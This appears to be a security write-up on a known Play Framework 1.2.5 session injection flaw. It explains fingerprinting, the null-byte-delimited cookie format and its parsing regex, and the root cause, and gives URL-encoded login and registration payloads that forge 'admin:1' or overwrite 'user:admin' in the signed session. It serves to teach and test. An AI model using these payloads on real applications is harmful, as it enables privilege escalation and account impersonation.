Skip to main content

play-session-injection

Play Session Injection

https://www.playframework.com/security/vulnerability/20130806-SessionInjection

The Play Framework (v1.2.5) stores session data client-side inside a signed cookie (PLAY_SESSION). While the cookie is protected by an HMAC-SHA1 signature, the content itself is not encrypted.

Due to flawed session parsing logic, attackers can inject null bytes (\x00) into session values and force the server to create additional session variables after the signature is applied.

This allows:

  • Privilege escalation (admin=1)
  • User impersonation (user=admin)
  • Logic manipulation without knowing the secret key

Fingerprinting Play Framework

Play can be identified via HTTP headers:

Server: Play! Framework;1.2.5;prod
Set-Cookie: PLAY_SESSION=...
danger

Running Play as root on port 80 further increases impact (full system compromise if chained).

Session Format

Session data is encoded as:

\x00key:value\x00\x00key:value\x00

Regex used by Play:

\0([^:]*):([^\0]*)\0

Parsed into a HashMap, meaning:

  • Later keys overwrite earlier ones
  • Multiple identical keys are allowed

Root Cause Analysis

  • : is blocked in keys
  • Null bytes are allowed in values
  • Regex-based parsing is unsafe
  • No structural format (JSON/YAML/etc.)
Vulnerable Logic
session.put(matcher.group(1), matcher.group(2));

No validation of injected delimiters.

Attack Strategy

Inject encoded null bytes (%00) and separators (%3a) into a session value (e.g. username) to forge new session variables.

Examples

Privilege Escalation (admin=1)

Goal

Inject:

admin:1

Payload (URL-encoded)

authenticityToken=...&username=test3%00%00admin%3a1%00&password=...&password_...

Resulting Session (server-side)

user:test
admin:1

✔ Signed by server
✔ Treated as valid
✔ Admin access granted

User Impersonation (Overwrite user)

Goal

Log in as admin

Payload to Register:

authenticityToken=...&username=test3%00%00user%3aadmin%00&password=...&password_...

Parsed Session Order

user:test
user:admin

✔ HashMap keeps last value
✔ User becomes admin

Why the Signature Doesn’t Save You

  • Injection happens before signing
  • Server signs attacker-controlled data
  • HMAC only protects integrity, not logic
  • No canonicalization before signing

Black-Box Detection Tips

When testing unknown apps:

  • Look for base64 / URL-encoded cookies
  • Try injecting:
    • %00
    • %3a
  • Observe session behavior changes
  • Check for overwritten values